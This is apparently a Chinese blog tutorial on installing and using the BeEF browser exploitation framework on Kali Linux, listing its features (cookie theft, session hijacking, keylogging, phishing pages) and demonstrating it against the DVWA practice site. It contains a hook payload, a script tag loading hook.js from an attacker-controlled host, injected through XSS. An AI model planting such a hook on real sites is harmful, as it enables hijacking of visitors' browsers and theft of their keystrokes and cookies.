今天写一下这个工具Beef

Browser Exploitation Framework(BeEF)
BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;
BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单
http://beefproject.com

主要功能

信息收集:
1.网络发现
2.主机信息
3. Cookie获取
4.会话劫持
5.键盘记录
6.插件信息

持久化控制:
1.确认弹框
2.小窗口
3.中间人

社会工程:
1.点击劫持
2.弹窗告警
3.虚假页面
4.钓鱼页面

渗透攻击:
1.内网渗透
2.Metasploit
3.CSRF攻击
4.DDOS攻击

我这里用kali
启动Apache：service apache2 start

然后安装Beef工具

我用脚本安装

命令：
apt-get update
apt-get install beef-xss
apt-get install beef-xss
beef-xss

启动之后

Hook: <script src="http://<IP>:3000/hook.js"></script>

会弹出来beef的登录窗口

这边我们在看一下beef绑定的3000端口

发现绑定3000端口的IP是0.0.0.0

发现是0.0.0.0 监听3000端口

那么远程也是可以访问的

成功登录

可以看到目前没有受控机

上面是在线浏览器 下面是离线浏览器

这边用DVWA的靶场的XSS

修改输入框的长度限制

可以看到 已经有受控主机了

点开之后

键盘记录在Logs模块

Commands模块 这里是可以实现的命令

命今颜色( Color):

• 绿色对目标主机生效并且不可见(不会被发现)
• 橙色对目标主机生效但可能可见(可能被发现)
• 灰色对目标主机来必生效(可验证下)
• 红色对目标主机不生效

主要模块

• Browsers

• Exploits

• Host

• Persistence（持久）

• Network

这里有很多板块 自己了解一下吧